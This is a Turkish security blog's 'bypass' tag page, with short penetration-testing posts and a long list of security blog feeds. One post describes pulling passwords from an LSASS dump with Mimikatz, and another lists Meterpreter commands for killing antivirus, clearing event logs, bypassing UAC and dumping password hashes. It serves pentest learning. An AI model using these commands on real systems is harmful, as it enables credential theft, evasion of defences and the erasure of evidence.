Siber Güvenlik Notları: bypass

bypass etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

14 Haziran 2013 Cuma

Procdump ve Mimikatz ile LSASS İçerisinden Oturum Açan Kullanıcıların Parolalarını Elde Etme

İpucu: Procdump ve Mimikatz ile LSASS İçerisinden Oturum Açan Kullanıcıların Parolalarını Elde Etme

Mimikatz bir prosesin (içerisinde kimlik bilgileri barındıran LSASS.exe) içinden logon olmuş kullanıcıların parolalarını çekebilmektedir. Böylece oturum açılabilen ama AV gibi engelleyici sistemler yüzünden mimikatz/wce çalıştırılamayan makinelerde proses içerisinden bu kimlik bilgileri elde edilebilir.

Yazının devamı için:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool/
ve
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-remote-windows-computers-command-line-using-mimikatz-tool/

19 Kasım 2012 Pazartesi

Antivirüs Atlatmak İçin Temel Yöntemler

Antivirüs Atlatmak İçin Temel Yöntemler

8 Ekim 2012 Pazartesi

Pentest Senaryoları

Senaryolar

5 Ekim 2012 Cuma

Hedef Sistemin Kabuğuna Düşme
execute -f cmd.exe -H -i
shell

Hedef Sistemde Dosya Arama
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf

Hedef Sistemden veri çekme, veri yükleme
upload BackTrackDizinindekiDosya KurbanBilgisayarDizinindekiDosya
download KurbanBilgisayarDizinindekiDosya BackTrackDizinindekiDosya

Makineyi yeniden başlatma
reboot

Antivirüsü kapatma
killav
Not: Bu modül tam olarak çalışmayabilir. Bu sebeple hedef makinenin kabuğuna düşüldükten sonra, önce AV prosesi bulunur. Sonra ilgili servisi bulunarak kapatılır veya disable edilip yeniden başlatılır. Daha sonra da AV prosesi sonlandırılır.

Event logları silme
clearev

UAC atlatma
run post/windows/escalate/bypassuac

Arp taraması ile makine keşfi
run arp_scanner -r 192.168.25.1/24

Parola özetlerini elde etme
hashdump
Ayrıntılı bilgi için bakınız.

Mevcut prosesleri listeleme
ps

Mevcut prosese sıçrama
migrate <Proses_Id>

Bilgisayarda işlem yapılmama vaktini tespit etme
idletime

Meterpreter'ın çalıştığı prosesin kullanıcısını izleme
getuid

Meterpreter'ın çalıştığı prosesin ID değerini izleme
getpid

SYSTEM hakkına sahip olma
getsystem

Oturumu kapatmadan Meterpreter'dan MSF'e geçiş
background

Oturumu kapatarak Meterpreter'dan MSF'e geçiş
exit

Takip Listesi

Bruce Schneier | Blog

Lawsuit About WhatsApp Security - Attaullah Baig, WhatsApp’s former head of security, has filed a whistleblower lawsuit alleging that Facebook deliberately failed to fix a bunch of securi...
28 dakika önce
Schneier on Security

Lawsuit About WhatsApp Security - Attaullah Baig, WhatsApp’s former head of security, has filed a whistleblower lawsuit alleging that Facebook deliberately failed to fix a bunch of securi...
28 dakika önce
The Register

Starlink outage knocks tens of thousands offline worldwide - Downdetector logged 40,000 reports before service flickered back Elon Musk's Starlink satellite broadband network went dark today as thousands of users ar...
47 dakika önce
ÇözümPark

Türkiye, Yapay Zekâ Hesaplarına Erişim Engeli Getiren İlk Ülke Oldu - Türkiye, küresel dijital platformlar üzerinde yapay zekâ tabanlı hesaplara getirdiği erişim kısıtlamalarıyla uluslararası arenada önemli bir düzenleme haml...
2 saat önce
The Hacker News

AI-Powered Villager Pen Testing Tool Hits 11,000 PyPI Downloads Amid Abuse Concerns - A new artificial intelligence (AI)-powered penetration testing tool linked to a China-based company has attracted nearly 11,000 downloads on the Python Pac...
4 saat önce
Security Affairs

UK ICO finds students behind majority of school data breaches - UK ICO reports students caused over half of school data breaches, showing kids are shaping cybersecurity in unexpected ways. The UK Information Commissione...
6 saat önce
SANS - Internet Storm Center (ISC)

ISC Stormcast For Monday, September 15th, 2025 https://isc.sans.edu/podcastdetail/9612, (Mon, Sep 15th) -
9 saat önce
SANS - Blog

ISC Stormcast For Monday, September 15th, 2025 https://isc.sans.edu/podcastdetail/9612, (Mon, Sep 15th) -
9 saat önce
Raj Chandel - Blog

AWS EC2 Credentials Theft via SSRF Abuse -
1 gün önce
Hakan Uzuner - Blog

Harvest Now Decrypt Later Kuantum Çağında Şifreleme Tehdidi - Kuantum teknolojisi hızla ilerliyor ve maalesef bu gelişmeyi en yakından takip eden gruplardan biri kötü niyetli aktörler. Bugün pratikte kırılamaz görünen...
1 gün önce
Active Directory Security

Active Directory Security Tip #1: Active Directory Admins - A critical part of Active Directory security is regularly reviewing your AD admins. The simplest way to do this is to recursively enumerate the membership ...
2 gün önce
4sysops

Add ChatGPT MCP server—Another setback for OpenAI - OpenAI has finally rolled out Model Context Protocol (MCP) support for all ChatGPT subscription plans. However, the implementation is surprisingly basic an...
2 gün önce
Webrazzi

İçerikleri özetleyip düzenleyen yapay zeka destekli kişisel bilgi yönetim aracı: Recall - Recall, kullanıcıların tükettiği dijital içerikleri daha hızlı öğrenmesini ve daha uzun süre hatırlamasını sağlayan bir girişim olarak öne çıkıyor. Platfor...
2 gün önce
PortSwigger - Web Security Blog

How this seasoned bug bounty hunter combines Burp Suite and HackerOne to uncover high-impact vulnerabilities - Arman S., a full-time independent security researcher and bug bounty hunter, talked us through how he uses Burp Suite Professional and HackerOne in tandem ...
2 gün önce
Forensic Focus Blog

Detego Global Champions South Wales Police And Falcons Rugby Teams With 2025/26 Sponsorship - Detego Global renews its sponsorship of South Wales Police & Falcons Rugby for the 2025/26 season, marking a third year of partnership built on performance...
2 gün önce
TechNewsWorld

Apple’s ‘Awe Dropping’ Event: 5 Themes Beyond the Products - [image: Attendees gather before Apple’s ‘Awe Dropping’ event at the Steve Jobs Theater in Cupertino, California, on Sep. 9, 2025.] Apple’s ‘Awe Dropping’ ev...
2 gün önce
Krebs on Security

Bulletproof Host Stark Industries Evades EU Sanctions - In May 2025, the European Union levied financial sanctions on the owners of Stark Industries Solutions Ltd., a bulletproof hosting provider that materializ...
3 gün önce
Olympos - Bilgi Güvenliği Rehberi

Musical Moments 🎶 -
3 gün önce
Kaspersky - Blog

Cybersecurity and privacy in LLM-powered AI browsers | Kaspersky official blog - We break down the pros, cons, and risks of browsers with built-in AI agents
3 gün önce
Kaspersky - Blog

Cybersecurity and privacy in LLM-powered AI browsers | Kaspersky official blog - We break down the pros, cons, and risks of browsers with built-in AI agents
3 gün önce
Darknet - The Darkside

Dark Web Search Engines in 2025 – Rankings, Risks & Ethical Trade-offs - Explore which dark web search engines in 2025 are reliable, what risks they pose, and how security professionals navigate ethics and uptime trade-offs.
5 gün önce
Offensive Security

5 Signs You’re Ready for a Career in Cybersecurity - Cybersecurity is one of the most exciting and impactful fields in technology. It offers the chance to solve complex problems, protect critical systems, a...
5 gün önce
Hexacorn Ltd

Beyond good ol’ Run key, Part 151 - Yes, they keep coming. There are still many Windows persistence mechanisms that are not described properly and my mission is to cover it all. Some of these...
6 gün önce
Anton Chuvakin - Blog

Recommended: interesting post…from my experience of auditing of large MNC…i can say that application level… - I recommended interesting post…from my experience of auditing of large MNC…i can say that application level… on TysonRhame. About me: http://www.chuvakin.org
1 hafta önce
ISR Bilgi Guvenliği - Blog

Siber Güvenlik Bülteni - Ağustos 2025 - Bültenimizin Ağustos Ayı konu başlıkları; Salesforce Veri Hırsızlığının Son Kurbanı Google Oldu1,2 Milyondan Fazla İnternete Bağlı Sağlık Cihazı Hasta Ver...
1 hafta önce
Windows Incident Response

Ransomware artifacts - I recently read through this FalconFeeds article on Qilin ransomware; being in DFIR consulting for as long as I have, and given how may ransomware incide...
1 hafta önce
Mert Sarica - Blog

Phishing Cloaking Techniques - Introduction Those of you who have read my blog post titled Investment Scammers have seen how scammers try to lure innocent people into their traps throu...
2 hafta önce
IT Audit Security

Skills Needed for IT Auditors of the Future - FENE OSAKWE wrote an article for ISACA entitled, Three Skills for Succeeding as an IT Auditor in the 21st Century. I’m assuming that his article and recom...
3 hafta önce
Hacker Target

Joomla Security Testing Guide 2025 : Recon and Exploitation - From passive recon to active exploitation, this Joomla 2025 guide shows the techniques attackers use. Explore common vulnerabilities and attack technique...
4 hafta önce
TEAkolik - Blog

Şebnem Ferah; Sahnenin Ötesinde Bir Ruh İfadesi… - Bir hayat düşünün… Müziğin evin her köşesinde dolaştığı, her enstrümanın onun çocuk düşüne bir parçası olduğu; acılarıyla direndiği, en büyük kırgınlıkla...
1 ay önce
SCADA StrangeLove

- *Nuk‑Nuke* https://github.com/scadastrangelove/nuknuke A lightning‑fast decoy web‑server that fools vulnerability scanners by feeding them the answers ...
1 ay önce
Dancho Danchev | Blog

Personal Research Photos - A Compilation - An image is worth a thousand words. ...
1 ay önce
Lenny Zeltser | Blog

How Security and Privacy Teams Break Barriers Together - While cybersecurity and data privacy leaders have distinct expertise, our fundamental goals are aligned. By understanding each other’s perspectives and pri...
2 ay önce
Mshowto

Microsoft Azure App Registrations Sertifika/Secret Süre Takibi - [image: Microsoft-Azure] Azure ortamında uygulama kimlik doğrulaması için kullanılan sertifikaların geçerlilik süreleri, sistem sürekliliği ve güvenliği aç...
2 ay önce
Contagio Malware Dump - Blog

REPRINT of http://contagiodump.blogspot.com/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html Sandbox MIMIng. CVE-2012-0158 in MHTML samples and analysis Unpublished May 27, 2024 - Wikipedia Update - Sept 4, 2013 I added more descriptions and changed *NjRat / Backdoor.LV *to *Vidgrab* - in the traffic communications are similar to N...
3 ay önce
ESET - Blog

How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2) - Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing ch...
4 ay önce
Oguzhan Topgul - Blog

Trust and Responsibility in Agentic AI - This year RSAC 2025 Conferance was all about Agentic AI and it let me start thinking a lot about it—not just in terms of what it can do, but how we ke...
4 ay önce
BTYON - Blog

- *28 Nisan 2025 İspanya, Portekiz ve Fransa’da Milyonları Etkileyen Geniş Çaplı Elektrik KesintisiYazar: Mert Umul* 28 Nisan 2025 Pazartesi günü, İspany...
4 ay önce
Hacking Exposed - Computer Forensics Blog

Daily Blog #815: I missed a day - Hello Reader, It happens to everyone and yesterday it happened to me. I was traveling and lost track of the day and realized I didn't post a blog yest...
4 ay önce
TaoSecurity

Creating a Large Text File Viewer by Vibe Coding with Visual Studio Code, Cline, OpenRouter, and Claude 3.7 - I just created another Windows 10/11 application using AI. This is a follow-up to the SquareCap program I posted about a few weeks ago. The problem I was...
5 ay önce
Sketchymoose's Blog

Gotta Captcha Them All! - It's old news now the whole Fake Captcha thing -- John Hammond did a great video outlining how it works over on the YouTubes. So I wont bother showing y...
6 ay önce
News & Packet Storm

Corrupted Microsoft Office Documents Used In Phishing Campaign -
9 ay önce
HITB Sec News

North Korean hackers posing as IT workers steal over $1B in cyberattack - North Korean hackers posing as IT workers steal over $1B in cyberattack l33tdawg Fri, 11/29/2024 - 10:31
9 ay önce
Siber Güç

📢Siber Güvenlik Haftası 2024 -
11 ay önce
Unmask Parasites - Blog

PGSlots เว็บตรงแท้ ปลอดภัย บริการดีที่สุดแห่งปี 2024 - เรารู้สึกตื่นเต้นเป็นอย่างมากที่จะประกาศเปิดตัวเว็บไซต์อย่างเป็นทางการสำหรับเกมจาก PG SOFT™ ซึ่งเป็นหนึ่งในผู้พัฒนาสล็อตที่นักพนันตั้งหน้าตั้งตารอมากที่สุด...
1 yıl önce
Penetration Testing Lab

Web Browser Stored Credentials - Microsoft introduced Data Protection Application Programming Interface (DPAPI) in Windows environments as a method to encrypt and decrypt sensitive data su...
1 yıl önce
IT Security Magazine

40 Steps Online Live Tutorials! - We are excited to announce our new format of “40 Steps”online LIVE TUTORIALS! Join our dynamic online live workshop and …
1 yıl önce
InfoWorld

All the brilliance of AI on minimalist platforms - Lately, I’ve been covering the overengineering and overprovisioning of resources in support of AI, both in the cloud and not in the cloud. AI architects...
1 yıl önce
Privacy and Information Security Law Blog

Nebraska Enacts Comprehensive State Privacy Law - On April 17, 2024, Governor Jim Pillen signed into law a bill (L.B. 1074) enacting the Nebraska Data Privacy Act. This blog entry provides a summary of t...
1 yıl önce
Security Law Blog

Nebraska Enacts Comprehensive State Privacy Law - On April 17, 2024, Governor Jim Pillen signed into law a bill (L.B. 1074) enacting the Nebraska Data Privacy Act. This blog entry provides a summary of t...
1 yıl önce
Forensic 4 Cast

bubirdenemebasligi - xbubirdenemeyazısıdır. World’s simplest online duplicate text remover for web developers and programmers. Just paste your text in the form below, press the...
1 yıl önce
Nebula Bilisim

Best Workplaces in Türkiye etkinliğinde çalışanlarımız referansı ile yapılan anketler sonucunda Great Place to Work ödülüne layık görüldük - Best Workplaces in Türkiye etkinliğinde çalışanlarımız referansı ile yapılan anketler sonucunda Great Place to Work ödülüne layık görüldük. Bu ödül,… Be...
1 yıl önce
NetSPI | Blog

Elevating Privileges with Azure Site Recovery Services - Discover how NetSPI uncovered and reported a Microsoft-managed Azure Site Recovery service vulnerability and how the finding was remediated. The post Ele...
1 yıl önce
Citrix - Blog

Save costs with new innovations in Autoscale - Citrix Autoscale was introduced in 2019, and ever since it has been one of our *most adopted features. *It’s easy to see why: with its ability to reduce ...
1 yıl önce
Brian McCann - Blog

Apple – OCTOBER 2023 security updates - Apple is a key hardware & software vendor for many organizations & several products have had recent security updates Apple Releases Security Advisories for...
1 yıl önce
RootShell - Blog

Hack.lu 2023 Wrap-Up - [Edit: Sorry for the “bullet-point” style, it was a lot of details to compile in this blog post] We were back at the Alvisse Parc Hotel after a break of ...
1 yıl önce
Naked Security - Sophos

Update on Naked Security - To consolidate all of our security intelligence and news in one location, we have migrated Naked Security to the Sophos News platform.
1 yıl önce
Network Intelligence - Blog

India’s Digital Personal Data Protection Act Vs The EU’s GDPR - India’s much-anticipated data protection law, the Digital Personal Data Protection Act, 2023 (DPDP), took a significant stride toward formal implementati...
1 yıl önce
Bilgisayar Temelleri

Java : Ve-Veya Operatörleri - *Ve Operatörü : * Ve operatörü "&"işareti ile gösterilir. Kodlama da ve operatörünü kullanmak istersek "&&" şeklinde 2 defa yazarak göstermek gerekir. V...
2 yıl önce
Room362

Simple PHP webshell with php filter chains - Recently found an LFI in a PHP application and one of the cool things I learned about recently was PHP filter chains. More info here: https://www.synacktiv...
2 yıl önce
Onur Oktay - Blog

ABD askerlerine büyük saldırı! - Amerikan ordusuna sürü İHA saldırısı gerçekleştirildi. Gelen ilk haberlere göre sürü iha saldırısında çok sayıda Amerikan askeri öldü! Gelen ilk haberlere ...
2 yıl önce
Anders Bengtsson - Contoso

Show number of hours a computer has been sending heartbeats, per day - Today I needed a Kusto query to show number of heartbeat events per computer, per day, for the last week. The query also needed to estimate number of hours...
2 yıl önce
PowerShell - Blog

Assign Arrays, not Array Elements - It has been touched before but it is happening so frequently that we decided to talk about it once more. If you use a loop, and if you’d like to calculat...
2 yıl önce
ICSA Labs

Q3 2022 Advanced Threat Defense (ATD) and ATD-Email Test Results Posted - How can organizations stop unknown threats, you ask? ICSA Labs performs quarterly security product/solution testing to see if/how well they protect endpoi...
2 yıl önce
Tweaks

Remove Consumer Microsoft Teams from Windows 11 - Windows 11 introduces a brand new version of Microsoft Teams build for consumers. This can be quite annoying if you are a business customer of Microsoft a...
3 yıl önce
PaulDotCom

The Unique Challenges of Companies Born in the Cloud - There are stark differences between how to manage security policies for on-premises network environments and those that are 100% cloud-based. But many co...
3 yıl önce
Alper Basaran - Blog

MITRE ATT&CK Gerçek Hayatta Ne İşimize Yarar? - Rusya kaynaklı siber saldırılar webinarı sırasında üzerinde durduğum önemli bir çalışma vardı. MITRE ATT&CK matrisini ele alıp hangi saldırıları tespi...
3 yıl önce
Security Pro News

PSA: Update Microsoft Teams on Android Now - WebProNews PSA: Update Microsoft Teams on Android Now If you’re running Microsoft Teams on Android, you should update immediately to avoid a bug that cri...
3 yıl önce
TrendLabs - Blog

Finest Free Torrenting VPNs - To find the best free torrenting VPN, merely type “best free VPN” into a popular search engine and press get into. You will be presented with several out...
3 yıl önce
Trend Micro Turkiye - Blog

Erth Baku Dönüyor - APT Grubunun Yeni Siber Casusluk Operasyonunun Ardındaki Yükseltilmiş Araç Seti Ortaya Çıkıyor. Araştırmamız, Earth Baku’nün Hint-Pasifik bölgesindeki kuru...
3 yıl önce
eHacking News

Elastic Stack API Security Vulnerability Exposes Customer and System Data - The mis-implementation of Elastic Stack, a collection of open-source products that employ APIs for crucial data aggregation, search, and analytics capa...
3 yıl önce
Infosec Island

FireEye Launches XDR Platform to Help Security Operations Teams - FireEye has launched FireEye XDR, a unified platform designed to help security operations teams strengthen threat detection, accelerate response capabiliti...
4 yıl önce
Gentil Kiwi - Blog

GIDS Cards - GIDS Cards are wonderful gifts from Vincent Le Toux (@mysmartlogon), they can transform JavaCards (2.2.1 or +) into universal SmartCards for Windows (7/200...
4 yıl önce
Hot forSecurity

How to Keep Your Devices and Personal Data Safe on Summer Vacation - The ongoing vaccination campaigns and easing of travel restrictions have encouraged millions of people to prepare for a relaxing vacation after months of l...
4 yıl önce
harmj0y - Blog

Certified Pre-Owned - TL;DR Active Directory Certificate Services has a lot of attack potential! Check out our whitepaper “Certified Pre-Owned: Abusing Active Directory Certif...
4 yıl önce
HackThisSite

Celebrating Pride - [center]*Wrong format*[/center] At HackThisSite, we have always tried to be a safe, welcoming place for people from every walk of life. This year we would ...
4 yıl önce
Anti-Forensics

Quickly Create False Profile Data (Python Faker) - How to Create Fake Data with Faker You can either Collect Data or Create your Own Data Read Full Article – Project Faker – Khuyen Tran Discuss on the Anti-...
4 yıl önce
Strategic Cyber - Blog

There’s a New Deputy in Town - It’s been less than a month since I joined the Cobalt Strike team. My first impressions of this team have been overwhelmingly positive. As Raphael transi...
4 yıl önce
SkullSecurity

BSidesSF CTF 2021 Author writeup: log-em-all, a Pokemon-style collection game [video] - This is a video walkthrough of Log 'em All, a difficult Hacking / Reverse Engineering challenge based on a classic bug in Pokemon Red. You can view the vid...
4 yıl önce
InfoSec Institute Resources

Easy Essay Tips – Getting Cheap Essays Done For Longer - Affordable essays are something which all people can love. Nonetheless, so as to acquire such essays performed in a good price, you have to take a few uniq...
4 yıl önce
Halil Ozturkci - Blog

Güvenli Online Toplantı ve Zoom Güvenliği - Bir çok sektörde olduğu gibi online video konferans platformları da pandemi sürecine hazırlıksız yakalandılar. Bir yandan çok hızlı bir şekilde ihtiyaç d...
4 yıl önce
Trend Micro - Blog

This Week in Security News: Ransomware Gang is Raking in Tens of Millions of Dollars and Microsoft Patch Tuesday Update Fixes 17 Critical Bugs - Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, ...
4 yıl önce
Malware Domain Blocklist

Ransomware on the Rise: The alarming trend and how to combat it. - An ominous splash screen, missing files and, naturally, a ransom note demanding payment: the calling card of a particularly vicious strain of cyberattack...
5 yıl önce
Hakki Inkaya - Blog

趣玩娱乐下载-三峡水库出现建库以来最大规模洪峰 - 中新社宜昌8月20日电 (郭晓莹董晓斌)三峡水库20日8时出现75000立方米每秒入库洪峰，刷新了2012年洪峰值(71200立方米每秒)，为三峡建库以来最大规模洪峰。截至当日12时，入库洪水流量仍...
5 yıl önce
TurkSec - Blog

Vmware ESXI Virtual Machine Hacking (Linux,Windows) - Yazar: Ahmet Çelik(t4cs1zkr4L) Vmware ESXI Virtual Machine Hacking (Linux,Windows) (Pass to Hash, Mimikatz, Windbg, Volatility ) Merhaba arkadaşlar, uzun ...
5 yıl önce
Thoughts on Security

Stream Securely: Simply and Privately Preserving Live Video Evidence - People recording acts of aggression and violence frequently find the assailant notices them, swipes their phone, and smashes it or deletes the evidence. In...
5 yıl önce
Computer Security News

QUIZ: Name These Midwestern Animals - Moose, deer, and bears, oh my!
5 yıl önce
Dark Operator

Getting DNS Client Cached Entries with CIM/WMI - What is DNS Cache The DNS cache maintains a database of recent DNS resolution in memory. This allows for faster resolution of hosts that have been queried ...
5 yıl önce
Kiddaland

Plaso 20200121 released - Plaso 20200121 released The Plaso team is pleased to announce the release of the first Plaso for 2020, Plaso 20200121. This is a relatively minor release ...
5 yıl önce
Msmvps - Blog

Sprint Customer Support Info leaked - Sprint Exposed Customer Support Site to Web “Fresh on the heels of a disclosure that Microsoft Corp. leaked internal customer support data to the Internet,...
5 yıl önce
Zscaler Research

Frenchy – Shellcode in the Wild - For the past few months, the Zscaler ThreatLabZ research team has seen a number of AutoIt and .NET samples from different malware families using what is be...
5 yıl önce
Andrew Morgan - Blog

Building Horizon Reach, why, how and whats next. - One of the best parts of my Job in the VMware EUC office of the CTO, is dealing with large escalations in our product that make their way up to Shawn’s att...
5 yıl önce
NetSecTr - Blog

Microsoft Güvenlik Çözümleri Kasım'19 Etkinliği - NETSEC Topluluğu olarak “Microsoft Güvenlik Çözümleri” konusu üzerine yeni etkinliğimiz 30 Kasım tarihinde Microsoft Türkiye İstanbul Ofisi’nde gerçekleş...
5 yıl önce
Volatility Labs

Results from the 2019 Volatility Contests are in! - We would like to begin by thanking the participants in this year’s contests! This was one of the hardest years for our panel of judges since it had so many...
5 yıl önce
BTRisk - Blog

BTROTP (ENG) - Supports multi-factor user authentication for RADIUS-compliant devices and applications.. It works integrated with MS Active Directory server, LDAP server ...
6 yıl önce
Another Forensics Blog

Triage Collection and Timeline Generation with KAPE - As a follow up to my SANS webcast, I wanted to post detailed instructions on how to use KAPE to collect triage data and generate a mini-timeline from the...
6 yıl önce
ToolWar

WebSlayer (Brute Forcing Web Applications) :: Tools - [image: OWASP WebSlayer :: ToolWar] *WebSlayer* is a tool designed for brute forcing Web Applications, it can be used for finding resources not linked (dir...
6 yıl önce
Anton Chuvakin | Gartner Blog

The Last Blog Post! - It is with some sadness and much excitement that I write this final post for my Gartner blog. If you recall, I joined Gartner in 2011, so it has been nearl...
6 yıl önce
Carnal0wnage | Attack Research Blog

Minecraft Mod, Follow up, and Java Reflection - After yesterday's post, I received a ton of interesting and creative responses regarding how to get around the mod's restrictions which is what I love abou...
6 yıl önce
Trusted Signal -- blog

Ode to Kasiski - 00101110 00000000 00000110 00001101 00000011 00011000 00001101 01010100 00001000 00001101 00010010 00000001 00011000 00000111 00000001 00010110 01001101 000...
6 yıl önce
Sharing in Security

MS17-010 executable exploit for local/remote privilege escalation - Hi there, Few months ago I modified a version of the Worawit Wang: GitHub zzz_exploit for MS17-010. The new version implements a few options such as usern...
6 yıl önce
Cozumpark - Windows Server

Active Directory CA Üzerinden Otomatik Sertifika Yenileme ve IIS Otomatik Sertifika Rebind İşlemi - IIS üzerinde site ilk defa kurulurken CA üzerinden sertifika almak ve bunun bind edilmesi rutin bir işlem. Ancak sorun, bu sertifikaların expire olm...
6 yıl önce
Cozumpark - Guvenlik

MBSA ile Windows System Hardening - Makaleme öncelikle System Hardening (Sistem Sıkılaştırma) nedir ile başlamak istiyorum. Sistem sıkılaştırmanın amacı, mümkün olduğu kadar çok güvenli...
6 yıl önce
Ugur Cihan Koc - Blog

Android – Bankacılık Zararlı Yazılım Analizi [ANUBIS] - Android dünyasında zararlı yazılımların sayısı gün geçtikçe artmaktadır. Bu zararlı yazılımlar Google Play Store’dan da yayılmaktadır. Evet, güvenli diye n...
6 yıl önce
Cozumpark - Exchange Server

Exchange 2019 Preferred Architecture PA – Tercih Edilen Mimari - Exchange Server 2019 çıkışı ile beraber ignite öncesi, ignite ve sonrasındaki tecrübelerimi sizler ile paylaşmaya devam ediyorum. Pek çok konuda olduğu gib...
6 yıl önce
Digital Forensics Blog

DFIR Training - Hello all! Back again, though not as soon as I had thought. Anyway, today I want to tell those who haven't already heard about the training offered by Bret...
6 yıl önce
Grand Stream Dreams

Current Browser Extensions: Vivaldi, Firefox, and Chromium - Wow. As best I can tell it was over three years ago that I last posted a roundup of the Add-On extensions I was using. Firefox as at version 40.0.3 (x32...
6 yıl önce
Network Security Blog

Lucky Break - One of the things I do from time to time is throw out an open ended question on Twitter. Sometimes I’m making a point, sometimes I just want to amuse myse...
6 yıl önce
SANS - Integriography

SAR UAVs: Video examples of IR, optical, and other challenges - We are working on developing a program for UAVs for SAR in NH. Part of this effort involves evaluating and selecting appropriate sensors. Another is “simpl...
6 yıl önce
SMTP Port 25

Kernel Migrator for Exchange - Migration of Exchange can be a complex, challenging and stressful task. It needs in-depth knowledge on Exchange and all the system connected to Exchange. A...
7 yıl önce
Jaap Brasser | Blog - Powershell.com

Arizona PowerShell User Group – From PowerShell Function to Serverless code with Azure Functions - Yesterday I was asked to speak at the Arizona PowerShell User Group, I picked the subject of moving your code into Azure Functions.
7 yıl önce
Seyir Defteri

Java v9 CobaltStrike Sorunu - Kali linux dağıtımı üzerinde cobaltstrike kullanıyorsanız Java versiyon yükselmesi ile birlikte cobaltstrike'ı kullanamadığınızı fark etmişsinizdir. Ald...
7 yıl önce
Yunus Emre Karabulut - Blog

Bu insanlar neden Starbucks’ı tercih ediyor? - Bir Starbucks fanı olmadığımı söyleyerek başlayayım. Yazıyı yazmaya karar verme sürecim “Türkiye’de Starbucks mağazalarının diğer ülkelere oranla hızlı art...
7 yıl önce
Rebootuser

Recent Changes… - It’s been a while since I wrote a personal post, but you may be aware that I recently co-founded a new company https://in.security with a good friend of mi...
7 yıl önce
j00ru//vx Tech - Blog

Wrapping up the kernel infoleak research with a whitepaper - Following the previous post in June last year, I continued to actively work on Bochspwn Reloaded, a Bochs-based tool designed to detect leaks of uninitiali...
7 yıl önce
CORE Security

What are the 3 Most Common Access Risks? - Identity and Access Management These days it seems like there are security solutions for almost everything except, the one thing you can never fully secure...
7 yıl önce
Zemana - Blog

Our Live Chat is ON! - Great news everyone! Starting from this week, you will have a chance to communicate with us live whenever you have any questions or concerns regarding pr...
7 yıl önce
Lostar Bilgi Guvenligi

Hello world! - Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!
7 yıl önce
Security List Network

Gpredict is satellite tracking and prediction application. - Gpredict is a real time satellite tracking and orbit prediction program for the Linux desktop. It uses the SGP4/SDP4 propagation algorithms together with N...
7 yıl önce
Ertan Erbek

お肌が荒れてる人の為のお肌のケアとは？ - 敏感肌の場合ならば肌質を改善することこそがきれいなお肌へのショートカットなのです。敏感肌は実は乾燥肌が悪化した悪化版だ。洗顔方法とかケアの方法について完全に矯正すればお肌にだって少しずつ変化が起きてきます！皮膚炎など … Continue reading "お肌が荒れてる人の為のお肌のケアとは？"
7 yıl önce
Ridvan Erbas - Pentesttr - Blog

Creating Hacking Lab - *Hacking ve Pentest işlemleri için Laboratuvar Kurma * Creating Hacking Lab eğitimi; Sanal dünyada test etmek istediğiniz pentest ve hacking işlemler...
7 yıl önce
Mark Gamache - Blog

If I Can't Reach Active Directory, it's Down - Unless it's not. I recently had a customer tell me that my AD servers were broken. They were unable to set SPNs via Setspn. They were able to run AD querie...
7 yıl önce
Microsoft Turkiye - Blog

blog.microsoft.com.tr - .
7 yıl önce
Digital Bond - SCADA

Site Moved … Go To S4xevents.com for S4 info … Go To Dale-Peterson.com for Consulting and Speaking - We are no longer updating the digitalbond.com site. My articles, podcasts, consulting and speaking info is on dale-peterson.com. For information on S4x19, ...
7 yıl önce
Hak5

TekThing 161 – Bitcoin Sucks For Gaming PCs!!! Our Video Gear, Fingbox Home Network Security - —— Thank You Patrons! Without your support via patreon.com/tekthing, we wouldn’t be able to make the show for you every week! https://www.patreon.com/tekth...
7 yıl önce
Alltop RSS

Data scientist: Yes, you can get ‘the sexiest job of the 21st century’ - Data science is the position of choice for analysts and managers who wish to take their careers to the next level. Think becoming a data scientist is out...
7 yıl önce
Forensic Methods

SANS Memory Forensics Cheat Sheet - Just in time for the holidays, we have a new update to the SANS Memory Forensics Cheatsheet! Plugins for the Volatility memory analysis project are organi...
7 yıl önce
My Digital Life

Able2Extract Professional 11 Review – A Powerful PDF Tool - PDFs or Portable Document Format files are steadily gaining popularity among business and home users since format’s debut in 1993. Considering they are l...
7 yıl önce
The Ethical Hacker Network

The Ethical Hacker Network Rises from the Ashes - [image: A phoenix depicted in a book of legendary creatures by FJ Bertuch (1747–1822)]This past summer while attending Black Hat and DEF CON, I was appro...
7 yıl önce
Myexploit

myexploit news - For the near future I will only be releasing new blogs on this site https://1337red.wordpress.com/ myexploit will continue but please vist 1337red for SE, ...
7 yıl önce
Cheeky4n6Monkey

Monkey takes a .heic - *The hills are alive ... with the compression of H.265!* With *iOS 11* and* macOS High Sierra* (10.13), Apple has introduced a file container format call...
7 yıl önce
Security Watch - PCMag

You Can't Remember Good Passwords, So You Need a Password Manager - Memory tricks can help you remember one very strong password, but in the real world you need dozens of passwords. That's OK. You can use that one strong pa...
7 yıl önce
Jeff Wouters - Blog

Get-ADUser : Year, Month, and Day parameters describe an un-representable DateTime - Today I’ve been working together with my colleague Irwin at a customer. We needed to do a small inventory off the active directory, amongs that was a list ...
7 yıl önce
Ulusal Bilgi Güvenliği Kapısı

Yenileme Çalışmaları - Ulusal Bilgi Güvenliği Kapısının yenileme çalışmaları devam etmektedir. Çok yakında yeni arayüz ve yeni içeriklerle hizmete sunulacaktır.
8 yıl önce
InfoSec Musings

Can our Managed SIEM providers please get their heads out of the 90's? - *rant mode on * (I had tried standard <> tags, and the CMS tried to process them! LOL) I've been a customer of SIEM (Security Incident and Event Moni...
8 yıl önce
ForensicKB

EnCase v8 EnScript - Check executables to VirusTotal - I have updated the EnScript to send hash values for all executable/DLLs to VirusTotal for analysis. This version works in EnCase v8 and the source code i...
8 yıl önce
Rapid7 Community

Metasploit Wrapup - Slowloris: SMB edition Taking a page from the Slowloris HTTP DoS attack, the aptly named SMBLoris DoS attack exploits a vuln contained in *many* Windows re...
8 yıl önce
Lifehacker

